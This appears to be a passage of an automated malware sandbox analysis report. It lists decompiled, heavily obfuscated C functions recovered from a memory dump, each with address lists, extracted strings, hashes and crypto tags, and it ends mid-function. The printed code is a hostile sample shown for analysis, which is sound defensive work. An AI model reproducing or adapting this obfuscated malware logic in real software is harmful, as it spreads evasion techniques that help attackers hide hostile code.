				_v8 = _v8 / _t98;
				_t99 = 0x26;
				_v8 = _v8 / _t99;
				_t100 = 0x25;
				_v8 = _v8 / _t100;
				_v8 = _v8 ^ 0x000e9c39;
				_v32 = 0x8070c1;
				_v32 = _v32 + 0xc0cc;
				_t101 = 0x71;
				_v32 = _v32 * 0x19;
				_v32 = _v32 ^ 0x0c949203;
				_v28 = 0xe65564;
				_v28 = _v28 << 2;
				_v28 = _v28 | 0x69fc1f71;
				_v28 = _v28 ^ 0x6bfad5f4;
				_v36 = 0x8014a;
				_v36 = _v36 + 0x7b6b;
				_v36 = _v36 ^ 0x0001b861;
				_v24 = 0xaa41dd;
				_v24 = _v24 / _t101;
				_v24 = _v24 * 0x29;
				_v24 = _v24 ^ 0x00356d71;
				E1000C7F0( *((intOrPtr*)( *0x10025218)), _v20, _v16, _v12, _v8);
				return E100088FC(_v32, _v28, _v36, _v24,  *((intOrPtr*)( *0x10025218 + 0x50)));
			}

0x1002058e
0x10020594
0x1002059b
0x100205a2
0x100205a6
0x100205ad
0x100205b4
0x100205bb
0x100205bf
0x100205c3
0x100205ca
0x100205d1
0x100205d8
0x100205df
0x100205e6
0x100205f2
0x100205f7
0x100205ff
0x10020604
0x1002060c
0x10020611
0x10020616
0x1002061d
0x10020624
0x1002062f
0x10020630
0x10020633
0x1002063a
0x10020641
0x10020645
0x1002064c
0x10020653
0x1002065a
0x10020661
0x10020668
0x10020674
0x1002067b
0x1002067e
0x10020699
0x100206bd

Strings

tL, xrefs: 100205B4
,f$, xrefs: 100205AD
Y(E, xrefs: 100205CA
dU, xrefs: 1002063A
qm5, xrefs: 1002067E
iq., xrefs: 100205E6

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Y(E$dU$iq.$qm5$tL$,f$
API String ID: 0-4158052290
Opcode ID: da338735b2b56f2422ff226a68357320e6a10b6d9114154f118ddfc80ad35383
Instruction ID: 500b7fe23fe36029c114d72d6b203373ea9be64c40bda6835cb8b8d7903f65a0
Opcode Fuzzy Hash: da338735b2b56f2422ff226a68357320e6a10b6d9114154f118ddfc80ad35383
Instruction Fuzzy Hash: 6731E276D0020DEBDF08CFE1D98A5AEBBB2FB48304F208149D515BA260D7B51B59CF84

Uniqueness

Uniqueness Score: -1.00%

Function 1001FB22, Relevance: 6.6, Strings: 5, Instructions: 327
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1001FB22(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				intOrPtr _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t385;
				signed int _t404;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t421;
				void* _t445;
				void* _t446;
				signed int* _t450;

				_t450 =  &_v2772;
				_v2604 = _v2604 & 0x00000000;
				_v2608 = 0xb89013;
				_v2632 = 0xdf9a6f;
				_v2632 = _v2632 + 0xd562;
				_v2632 = _v2632 ^ 0x00e06ff8;
				_v2696 = 0xef8c76;
				_v2696 = _v2696 << 5;
				_v2696 = _v2696 ^ 0xdc2e0dcc;
				_v2696 = _v2696 ^ 0xc1d17eba;
				_v2768 = 0xdf4f31;
				_v2768 = _v2768 ^ 0xec25606b;
				_v2768 = _v2768 << 7;
				_v2768 = _v2768 ^ 0x36092821;
				_v2768 = _v2768 ^ 0x4b1623c0;
				_v2736 = 0x6d0fdd;
				_v2736 = _v2736 << 9;
				_v2736 = _v2736 * 0x64;
				_t445 = __ecx;
				_v2736 = _v2736 + 0x3ebb;
				_t446 = 0x296d301;
				_v2736 = _v2736 ^ 0x346bec44;
				_v2692 = 0x377789;
				_v2692 = _v2692 >> 2;
				_v2692 = _v2692 | 0x91d2260d;
				_v2692 = _v2692 ^ 0x91d1c2bd;
				_v2760 = 0x869c0c;
				_v2760 = _v2760 + 0x490c;
				_v2760 = _v2760 ^ 0xaf3561b6;
				_v2760 = _v2760 | 0x210a711f;
				_v2760 = _v2760 ^ 0xafb56961;
				_v2616 = 0x160afc;
				_v2616 = _v2616 ^ 0x8a3e33fd;
				_v2616 = _v2616 ^ 0x8a2da4b1;
				_v2708 = 0xaaba8;
				_v2708 = _v2708 + 0x239e;
				_v2708 = _v2708 ^ 0x55e2b0a1;
				_v2708 = _v2708 ^ 0x55eb71ba;
				_v2676 = 0x15dd61;
				_v2676 = _v2676 | 0x9f7776ad;
				_v2676 = _v2676 << 0xe;
				_v2676 = _v2676 ^ 0xfffdbd4c;
				_v2744 = 0x36e8cc;
				_v2744 = _v2744 ^ 0x3ea06ef0;
				_v2744 = _v2744 ^ 0x262ef79b;
				_v2744 = _v2744 + 0xffff496d;
				_v2744 = _v2744 ^ 0x18beed9b;
				_v2716 = 0x5e887a;
				_v2716 = _v2716 ^ 0x6ea1409b;
				_v2716 = _v2716 + 0x1643;
				_v2716 = _v2716 ^ 0x6ef4ce3b;
				_v2648 = 0x7b2450;
				_v2648 = _v2648 << 0xe;
				_v2648 = _v2648 ^ 0xc91080ce;
				_v2660 = 0x7f5310;
				_v2660 = _v2660 | 0x8d3e0215;
				_v2660 = _v2660 ^ 0x8d751399;
				_v2752 = 0xd4bf8a;
				_t404 = 0x5f;
				_v2752 = _v2752 * 0x1d;
				_v2752 = _v2752 + 0x73d9;
				_v2752 = _v2752 << 9;
				_v2752 = _v2752 ^ 0x34449e6f;
				_v2684 = 0x83a9ea;
				_v2684 = _v2684 ^ 0xe5f22383;
				_v2684 = _v2684 >> 3;
				_v2684 = _v2684 ^ 0x1cafb7b8;
				_v2668 = 0x3d4dd6;
				_v2668 = _v2668 * 0x14;
				_v2668 = _v2668 / _t404;
				_v2668 = _v2668 ^ 0x000c0961;
				_v2700 = 0x975cb3;
				_v2700 = _v2700 ^ 0x4125cfeb;
				_t407 = 0x4f;
				_v2700 = _v2700 / _t407;
				_v2700 = _v2700 ^ 0x00d7d8cf;
				_v2772 = 0x85da10;
				_t408 = 0x45;
				_v2772 = _v2772 / _t408;
				_v2772 = _v2772 >> 6;
				_v2772 = _v2772 + 0xffff4516;
				_v2772 = _v2772 ^ 0xfffb08f6;
				_v2720 = 0x4b0464;
				_v2720 = _v2720 >> 3;
				_v2720 = _v2720 >> 8;
				_v2720 = _v2720 ^ 0x000a6582;
				_v2724 = 0xa2725;
				_v2724 = _v2724 << 9;
				_v2724 = _v2724 + 0xffff2032;
				_v2724 = _v2724 ^ 0x144eb873;
				_v2640 = 0x803b29;
				_v2640 = _v2640 >> 5;
				_v2640 = _v2640 ^ 0x0009ca7b;
				_v2628 = 0x227b5;
				_v2628 = _v2628 + 0x95b1;
				_v2628 = _v2628 ^ 0x0005b05d;
				_v2764 = 0x9e0bff;
				_t409 = 0xc;
				_v2764 = _v2764 * 0x27;
				_v2764 = _v2764 >> 1;
				_v2764 = _v2764 + 0x528b;
				_v2764 = _v2764 ^ 0x0c09d233;
				_v2704 = 0x2d5162;
				_v2704 = _v2704 | 0x8a36a6fd;
				_v2704 = _v2704 >> 8;
				_v2704 = _v2704 ^ 0x00843d8b;
				_v2712 = 0xd2d8ca;
				_v2712 = _v2712 >> 9;
				_v2712 = _v2712 >> 0xb;
				_v2712 = _v2712 ^ 0x000539f8;
				_v2620 = 0xf6be0b;
				_v2620 = _v2620 ^ 0x064d9bb8;
				_v2620 = _v2620 ^ 0x06bd7537;
				_v2728 = 0xeb5314;
				_v2728 = _v2728 + 0xffff0a95;
				_v2728 = _v2728 ^ 0x8aefdd43;
				_v2728 = _v2728 ^ 0x8a0538f2;
				_v2748 = 0xf9c127;
				_v2748 = _v2748 ^ 0x4aeb94dc;
				_v2748 = _v2748 | 0x64a3e293;
				_v2748 = _v2748 ^ 0x1ed1963e;
				_v2748 = _v2748 ^ 0x706baa63;
				_v2756 = 0x8f6e4c;
				_v2756 = _v2756 / _t409;
				_v2756 = _v2756 / _t404;
				_v2756 = _v2756 + 0x730;
				_v2756 = _v2756 ^ 0x000e6312;
				_v2612 = 0xbec58c;
				_v2612 = _v2612 ^ 0x19562753;
				_v2612 = _v2612 ^ 0x19e1464e;
				_v2740 = 0x1c2d20;
				_v2740 = _v2740 ^ 0xe8dc8e9e;
				_v2740 = _v2740 ^ 0x9c3a4ce3;
				_v2740 = _v2740 >> 9;
				_v2740 = _v2740 ^ 0x003eebf5;
				_v2656 = 0xcf4e45;
				_v2656 = _v2656 | 0x2792512b;
				_v2656 = _v2656 ^ 0x27d162cf;
				_v2688 = 0x5002cd;
				_v2688 = _v2688 | 0xc1790fd1;
				_t410 = 0x5d;
				_v2688 = _v2688 * 0x60;
				_v2688 = _v2688 ^ 0x8d612aa6;
				_v2624 = 0xe255c7;
				_v2624 = _v2624 * 0x3e;
				_v2624 = _v2624 ^ 0x36d2f248;
				_v2732 = 0x2e0e33;
				_v2732 = _v2732 * 0x3b;
				_v2732 = _v2732 * 0x39;
				_v2732 = _v2732 | 0x6f9c688e;
				_v2732 = _v2732 ^ 0x7f97f994;
				_v2644 = 0x4eba1d;
				_v2644 = _v2644 << 1;
				_v2644 = _v2644 ^ 0x00912b1d;
				_v2652 = 0xfa5e44;
				_v2652 = _v2652 ^ 0xd8af2eaa;
				_v2652 = _v2652 ^ 0xd85b7e66;
				_v2664 = 0x9f2bb6;
				_v2664 = _v2664 * 0x3c;
				_v2664 = _v2664 + 0xffff1a38;
				_v2664 = _v2664 ^ 0x254f3acc;
				_v2636 = 0x3bf66a;
				_v2636 = _v2636 << 6;
				_v2636 = _v2636 ^ 0x0ef40ca2;
				_v2672 = 0x51a52d;
				_v2672 = _v2672 >> 0xe;
				_v2672 = _v2672 * 0x68;
				_v2672 = _v2672 ^ 0x0004e38d;
				_v2680 = 0xe8d4ef;
				_t385 = _v2680 / _t410;
				_v2680 = _t385;
				_v2680 = _v2680 + 0xffff177f;
				_v2680 = _v2680 ^ 0x0008700f;
				do {
					while(_t446 != 0x296d301) {
						if(_t446 != 0x51a502c) {
							if(_t446 == 0x657ab98) {
								_push(_t410);
								E1000441F(_v2764, _v2632, _v2704, _v2712,  &_v1040, _t410, _v2620);
								_push(_v2612);
								_push(_v2756);
								_push(_v2748);
								E100049CE( &_v1040,  &_v2080, E1000416C(_v2728, 0x10001754), _v2740, _v2656, _v2728, _v2688, _v2624);
								_t421 = _v2732;
								E1000B952(_t421, _t398, _v2644, _v2652);
								_push(_v2680);
								_push( &_v520);
								_push(_t421);
								_push(0);
								_push(_v2672);
								_push(_v2636);
								_push(_v2664);
								return E1000D1FD(0, 0, 0);
							}
							goto L9;
						}
						E1001E780(_v2696, __eflags, _v2768,  &_v2600);
						 *((short*)(E10001A5C( &_v2600, _v2736, _v2692))) = 0;
						E1001215E(_v2760, _v2616, __eflags,  &_v1560);
						_push(_v2716);
						_push(_v2744);
						_push(_v2676);
						E100049CE( &_v2600,  &_v1560, E1000416C(_v2708, 0x10001684), _v2648, _v2660, _v2708, _v2752, _v2684);
						E1000B952(_v2668, _t391, _v2700, _v2772);
						_t410 = _v2720;
						_t385 = E1001C962(_t410, _v2724, _t445, _v2640, _v2628,  &_v2080);
						_t450 =  &(_t450[0x14]);
						__eflags = _t385;
						if(__eflags != 0) {
							_t446 = 0x657ab98;
							continue;
						}
						return _t385;
					}
					_t446 = 0x51a502c;
					L9:
					__eflags = _t446 - 0x564a993;
				} while (__eflags != 0);
				return _t385;
			}

0x1001fb22
0x1001fb28
0x1001fb32
0x1001fb3d
0x1001fb48
0x1001fb53
0x1001fb5e
0x1001fb66
0x1001fb6b
0x1001fb73
0x1001fb7b
0x1001fb83
0x1001fb8b
0x1001fb90
0x1001fb98
0x1001fba0
0x1001fba8
0x1001fbb6
0x1001fbba
0x1001fbbc
0x1001fbc4
0x1001fbc9
0x1001fbd1
0x1001fbd9
0x1001fbde
0x1001fbe6
0x1001fbee
0x1001fbf6
0x1001fbfe
0x1001fc06
0x1001fc0e
0x1001fc16
0x1001fc21
0x1001fc2c
0x1001fc37
0x1001fc3f
0x1001fc47
0x1001fc4f
0x1001fc57
0x1001fc5f
0x1001fc67
0x1001fc6c
0x1001fc74
0x1001fc7c
0x1001fc84
0x1001fc8c
0x1001fc94
0x1001fc9c
0x1001fca4
0x1001fcac
0x1001fcb4
0x1001fcbc
0x1001fcc7
0x1001fccf
0x1001fcda
0x1001fce5
0x1001fcf0
0x1001fcfb
0x1001fd0a
0x1001fd0b
0x1001fd0f
0x1001fd17
0x1001fd1c
0x1001fd24
0x1001fd2c
0x1001fd34
0x1001fd39
0x1001fd41
0x1001fd4e
0x1001fd58
0x1001fd5c
0x1001fd64
0x1001fd6e
0x1001fd7c
0x1001fd81
0x1001fd85
0x1001fd8d
0x1001fd9b
0x1001fda0
0x1001fda4
0x1001fda9
0x1001fdb1
0x1001fdb9
0x1001fdc1
0x1001fdc6
0x1001fdcb
0x1001fdd3
0x1001fddb
0x1001fde0
0x1001fde8
0x1001fdf0
0x1001fdfb
0x1001fe03
0x1001fe0e
0x1001fe19
0x1001fe24
0x1001fe2f
0x1001fe3e
0x1001fe3f
0x1001fe43
0x1001fe47
0x1001fe4f
0x1001fe57
0x1001fe5f
0x1001fe67
0x1001fe6c
0x1001fe74
0x1001fe7c
0x1001fe81
0x1001fe86
0x1001fe8e
0x1001fe99
0x1001fea4
0x1001feaf
0x1001feb7
0x1001febf
0x1001fec7
0x1001fecf
0x1001fed7
0x1001fedf
0x1001fee7
0x1001feef
0x1001fef7
0x1001ff07
0x1001ff11
0x1001ff15
0x1001ff1d
0x1001ff25
0x1001ff30
0x1001ff3b
0x1001ff46
0x1001ff4e
0x1001ff56
0x1001ff5e
0x1001ff63
0x1001ff6b
0x1001ff76
0x1001ff83
0x1001ff93
0x1001ffa0
0x1001ffaf
0x1001ffb0
0x1001ffb4
0x1001ffbc
0x1001ffcf
0x1001ffd6
0x1001ffe1
0x1001ffee
0x1001fff7
0x1001fffb
0x10020003
0x1002000b
0x10020016
0x1002001d
0x10020028
0x10020033
0x1002003e
0x10020049
0x10020056
0x1002005a
0x10020062
0x1002006a
0x10020075
0x1002007d
0x10020088
0x10020090
0x1002009a
0x1002009e
0x100200a6
0x100200b2
0x100200b4
0x100200b8
0x100200c0
0x100200c8
0x100200c8
0x100200d6
0x100200de
0x100200e4
0x10020108
0x1002010d
0x10020119
0x1002011d
0x1002015d
0x10020172
0x10020176
0x10020187
0x1002018b
0x1002018c
0x1002018d
0x1002018f
0x10020198
0x1002019f
0x00000000
0x100201ab
0x00000000
0x100200de
0x100201c9
0x100201eb
0x100201fa
0x100201ff
0x10020208
0x1002020c
0x1002024f
0x10020265
0x10020284
0x10020289
0x1002028e
0x10020291
0x10020293
0x10020299
0x00000000
0x10020299
0x100201b8
0x100201b8
0x100202a0
0x100202a2
0x100202a2
0x100202a2
0x00000000

Strings

%', xrefs: 1001FDD3
!(6, xrefs: 1001FB90
P${, xrefs: 1001FCBC
bQ-, xrefs: 1001FE57
Dk4, xrefs: 1001FBC9

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: !(6$%'$Dk4$P${$bQ-
API String ID: 0-1197038309
Opcode ID: 3eaa3f564486ad34979054dd7cca58987da531e73849c454c70479e8a9a3c5a8
Instruction ID: f1606994d1f3a4eb98e06382aa21fb81f8f041357cc206659eaf32c2cec456d0
Opcode Fuzzy Hash: 3eaa3f564486ad34979054dd7cca58987da531e73849c454c70479e8a9a3c5a8
Instruction Fuzzy Hash: 020200715083809FD369CF21C58AA8BBBF1FBC5748F508A1DE2DA96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001EC5A, Relevance: 6.5, Strings: 5, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001EC5A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t209;
				void* _t231;
				void* _t235;
				void* _t238;
				void* _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int* _t284;

				_push(_a8);
				_t280 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t209);
				_v64 = 0xb23001;
				_t284 =  &(( &_v128)[4]);
				_v64 = _v64 | 0x65da4dba;
				_v64 = _v64 ^ 0x65f87698;
				_t281 = 0;
				_v68 = 0xeb8337;
				_t252 = 0x14f700b;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x00060b51;
				_v116 = 0xd01772;
				_t245 = 0x4f;
				_v116 = _v116 / _t245;
				_t246 = 0x22;
				_v116 = _v116 * 0x79;
				_v116 = _v116 + 0xffff7b0e;
				_v116 = _v116 ^ 0x013012be;
				_v60 = 0x35bf6b;
				_v60 = _v60 >> 5;
				_v60 = _v60 ^ 0x0000b377;
				_v92 = 0x698abf;
				_v92 = _v92 + 0xffff728a;
				_v92 = _v92 / _t246;
				_v92 = _v92 ^ 0x000e3a6e;
				_v96 = 0x8b4ea4;
				_v96 = _v96 + 0xfffffd77;
				_v96 = _v96 * 0x6c;
				_v96 = _v96 ^ 0x3ac4e5e7;
				_v108 = 0xb42051;
				_v108 = _v108 + 0x4dc8;
				_v108 = _v108 >> 5;
				_v108 = _v108 + 0xffffcb31;
				_v108 = _v108 ^ 0x000f0f8f;
				_v72 = 0x621694;
				_v72 = _v72 << 9;
				_v72 = _v72 * 0x24;
				_v72 = _v72 ^ 0x96553857;
				_v76 = 0xa578e;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 ^ 0x000ea88c;
				_v80 = 0x3f530c;
				_v80 = _v80 ^ 0x62708baf;
				_v80 = _v80 | 0x7e22fa35;
				_v80 = _v80 ^ 0x7e659ce0;
				_v120 = 0xf6ffe5;
				_v120 = _v120 * 0x4f;
				_v120 = _v120 >> 2;
				_v120 = _v120 >> 3;
				_v120 = _v120 ^ 0x026b4e40;
				_v124 = 0x108f5a;
				_v124 = _v124 * 0x2c;
				_v124 = _v124 + 0xd6d8;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x00296f59;
				_v128 = 0x6627ea;
				_t98 =  &_v128; // 0x6627ea
				_t247 = 0xa;
				_v128 =  *_t98 / _t247;
				_v128 = _v128 + 0xffff4720;
				_v128 = _v128 >> 7;
				_v128 = _v128 ^ 0x0008db2a;
				_v100 = 0x49e23c;
				_v100 = _v100 + 0x22f5;
				_t248 = 0x49;
				_v100 = _v100 / _t248;
				_v100 = _v100 ^ 0x000d4ad0;
				_v84 = 0xa7a0de;
				_v84 = _v84 + 0x9590;
				_v84 = _v84 + 0xffff7edd;
				_v84 = _v84 ^ 0x00a852b7;
				_v112 = 0xafaa65;
				_v112 = _v112 + 0xff0b;
				_v112 = _v112 ^ 0x3d31edcc;
				_v112 = _v112 ^ 0xcc13de16;
				_v112 = _v112 ^ 0xf19b733a;
				_v56 = 0xe2457e;
				_v56 = _v56 + 0xd888;
				_v56 = _v56 ^ 0x00e734a9;
				_v88 = 0x56a65d;
				_v88 = _v88 + 0xffff4a67;
				_t249 = 0x52;
				_v88 = _v88 / _t249;
				_v88 = _v88 ^ 0x000a3d5b;
				_v48 = 0xf66f30;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0x000f74b5;
				_v104 = 0x5e53f5;
				_v104 = _v104 * 0x58;
				_v104 = _v104 ^ 0x203f5cc2;
				_v104 = _v104 << 1;
				_v104 = _v104 ^ 0x00a1f747;
				_v52 = 0x398dd2;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00059fbc;
				while(_t252 != 0x14f700b) {
					if(_t252 == 0x44b9b12) {
						_t231 = E1001F6F2(_v108, _v72, _t280 + 4, _v76, _v80,  &_v44);
						_t284 =  &(_t284[4]);
						__eflags = _t231;
						if(__eflags != 0) {
							_t252 = 0xfbb0d24;
							continue;
						}
					} else {
						if(_t252 == 0x52bce53) {
							_t235 = E1001F6F2(_v84, _v112, _t280 + 0x3c, _v56, _v88,  &_v44);
							_t284 =  &(_t284[4]);
							__eflags = _t235;
							if(__eflags != 0) {
								_t252 = 0xbe48bae;
								continue;
							}
						} else {
							if(_t252 == 0x542f74e) {
								_t238 = E1001F6F2(_v116, _v60, _t280 + 0x28, _v92, _v96,  &_v44);
								_t284 =  &(_t284[4]);
								__eflags = _t238;
								if(__eflags != 0) {
									_t252 = 0x44b9b12;
									continue;
								}
							} else {
								if(_t252 == 0x8063465) {
									E1000A488(_a8,  &_v44, _v64, _v68);
									_t284 =  &(_t284[2]);
									_t252 = 0x542f74e;
									continue;
								} else {
									if(_t252 == 0xbe48bae) {
										__eflags = E10003FB0(_t280 + 0x20, _v48, __eflags, _v104, _v52,  &_v44);
										_t281 =  !=  ? 1 : _t281;
									} else {
										if(_t252 != 0xfbb0d24) {
											L18:
											__eflags = _t252 - 0x9d50ae7;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_t244 = E1001F6F2(_v120, _v124, _t280 + 0x4c, _v128, _v100,  &_v44);
											_t284 =  &(_t284[4]);
											if(_t244 != 0) {
												_t252 = 0x52bce53;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t281;
				}
				_t252 = 0x8063465;
				goto L18;
			}

0x1001ec64
0x1001ec6b
0x1001ec6d
0x1001ec74
0x1001ec75
0x1001ec76
0x1001ec7b
0x1001ec83
0x1001ec86
0x1001ec90
0x1001ec98
0x1001ec9a
0x1001eca2
0x1001eca7
0x1001ecac
0x1001ecb4
0x1001ecc2
0x1001ecc7
0x1001ecd2
0x1001ecd5
0x1001ecd9
0x1001ece1
0x1001ece9
0x1001ecf1
0x1001ecf6
0x1001ecfe
0x1001ed06
0x1001ed14
0x1001ed18
0x1001ed20
0x1001ed28
0x1001ed35
0x1001ed39
0x1001ed41
0x1001ed49
0x1001ed51
0x1001ed56
0x1001ed5e
0x1001ed66
0x1001ed6e
0x1001ed78
0x1001ed7c
0x1001ed84
0x1001ed8c
0x1001ed91
0x1001ed96
0x1001ed9e
0x1001eda6
0x1001edae
0x1001edb6
0x1001edbe
0x1001edcb
0x1001edcf
0x1001edd4
0x1001edd9
0x1001ede1
0x1001edee
0x1001edf2
0x1001edfa
0x1001edff
0x1001ee09
0x1001ee11
0x1001ee15
0x1001ee1f
0x1001ee23
0x1001ee2b
0x1001ee30
0x1001ee38
0x1001ee40
0x1001ee4e
0x1001ee53
0x1001ee57
0x1001ee5f
0x1001ee67
0x1001ee6f
0x1001ee77
0x1001ee7f
0x1001ee87
0x1001ee8f
0x1001ee97
0x1001ee9f
0x1001eea7
0x1001eeaf
0x1001eeb7
0x1001eebf
0x1001eec7
0x1001eed5
0x1001eeda
0x1001eede
0x1001eee6
0x1001eeee
0x1001eef3
0x1001eefb
0x1001ef08
0x1001ef0c
0x1001ef14
0x1001ef18
0x1001ef20
0x1001ef33
0x1001ef37
0x1001ef3f
0x1001ef4d
0x1001f04d
0x1001f052
0x1001f055
0x1001f057
0x1001f059
0x00000000
0x1001f059
0x1001ef53
0x1001ef55
0x1001f01e
0x1001f023
0x1001f026
0x1001f028
0x1001f02a
0x00000000
0x1001f02a
0x1001ef5b
0x1001ef61
0x1001efee
0x1001eff3
0x1001eff6
0x1001eff8
0x1001effe
0x00000000
0x1001effe
0x1001ef63
0x1001ef69
0x1001efc3
0x1001efc8
0x1001efcb
0x00000000
0x1001ef6b
0x1001ef71
0x1001f095
0x1001f097
0x1001ef77
0x1001ef7d
0x1001f068
0x1001f068
0x1001f06e
0x00000000
0x00000000
0x1001f074
0x1001ef83
0x1001ef9c
0x1001efa1
0x1001efa6
0x1001efac
0x00000000
0x1001efac
0x1001efa6
0x1001ef7d
0x1001ef71
0x1001ef69
0x1001ef61
0x1001ef55
0x1001f0a6
0x1001f0a6
0x1001f063
0x00000000

Strings

'f, xrefs: 1001EE11
<I, xrefs: 1001EE38
[=, xrefs: 1001EEDE
Yo), xrefs: 1001EDFF
~E, xrefs: 1001EEA7

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: <I$Yo)$[=$~E$'f
API String ID: 0-2549811094
Opcode ID: 00846d7891b5b2b8d1d416eb8fdaec3dbee6a2893ef5bb314c6ea0bc70bd2461
Instruction ID: e5727493a3e71559e6bed85c5643e5e7cd6ba6843e6ea71e5c548260f8b8bf76
Opcode Fuzzy Hash: 00846d7891b5b2b8d1d416eb8fdaec3dbee6a2893ef5bb314c6ea0bc70bd2461
Instruction Fuzzy Hash: 49B123725083819FC358CF61C88A41BFBE1FBD8398F50891DF59586261D7B5DA89CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1001D8AD, Relevance: 6.5, Strings: 5, Instructions: 205
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001D8AD() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t182;
				signed int _t185;
				void* _t187;
				signed int _t190;
				void* _t192;
				void* _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				intOrPtr* _t229;
				signed int _t230;
				signed int* _t231;

				_t231 =  &_v68;
				_v52 = 0x4881bd;
				_t192 = 0x2c4c5be;
				_t222 = 0x11;
				_v52 = _v52 / _t222;
				_t221 = 0;
				_t223 = 0x38;
				_v52 = _v52 * 0x2d;
				_v52 = _v52 ^ 0x00beedd9;
				_v40 = 0xc8140a;
				_v40 = _v40 * 0x4b;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x00e57744;
				_v44 = 0xcaf86c;
				_v44 = _v44 + 0x68a5;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0xb610ab33;
				_v68 = 0x3f6d2a;
				_v68 = _v68 | 0x14248a7c;
				_v68 = _v68 >> 3;
				_v68 = _v68 + 0xffff5da0;
				_v68 = _v68 ^ 0x0287dc6a;
				_v12 = 0x32c9bb;
				_v12 = _v12 >> 6;
				_v12 = _v12 ^ 0x000d2961;
				_v48 = 0x371cf1;
				_v48 = _v48 ^ 0xc6e64536;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 ^ 0x0006756f;
				_v16 = 0x47c9ee;
				_v16 = _v16 * 0x15;
				_v16 = _v16 ^ 0x05ee1d22;
				_v32 = 0x5cbd3d;
				_v32 = _v32 ^ 0x3773e9f1;
				_v32 = _v32 | 0xb5d545a0;
				_v32 = _v32 ^ 0xb7f39f8e;
				_v36 = 0x86f06d;
				_v36 = _v36 << 8;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x21b2d1ad;
				_v64 = 0xe52bde;
				_v64 = _v64 / _t223;
				_v64 = _v64 + 0x348f;
				_v64 = _v64 | 0x471a5edb;
				_v64 = _v64 ^ 0x47128ff2;
				_v8 = 0x5cb089;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xb96440ce;
				_v56 = 0xb7b28d;
				_t224 = 0x44;
				_v56 = _v56 * 0x1f;
				_v56 = _v56 * 0x38;
				_v56 = _v56 | 0xe521c9f5;
				_v56 = _v56 ^ 0xfdb210cd;
				_v28 = 0x389ae0;
				_v28 = _v28 + 0xffffd296;
				_v28 = _v28 * 0x55;
				_v28 = _v28 ^ 0x12bef369;
				_v60 = 0x413e34;
				_v60 = _v60 << 7;
				_v60 = _v60 / _t224;
				_t225 = 9;
				_v60 = _v60 / _t225;
				_v60 = _v60 ^ 0x000e115e;
				_v20 = 0x89a19b;
				_t190 = 0x5c;
				_v20 = _v20 / _t190;
				_v20 = _v20 + 0xffffb62e;
				_v20 = _v20 ^ 0x00078a44;
				_v4 = 0x1bddbc;
				_v4 = _v4 >> 3;
				_v4 = _v4 ^ 0x0001c9c8;
				_v24 = 0x2548c1;
				_t226 = 0x34;
				_t191 = _v4;
				_t230 = _v4;
				_t227 = _v4;
				_v24 = _v24 / _t226;
				_v24 = _v24 | 0x12208f82;
				_v24 = _v24 ^ 0x122b6ee7;
				while(1) {
					L1:
					_t182 = 0x462c85d;
					do {
						L2:
						while(_t192 != 0x2c4c5be) {
							if(_t192 == 0x3f88eb9) {
								E10010839(_v56, _t230, _v28, _v60);
								_t192 = 0xd87e31d;
								goto L1;
							} else {
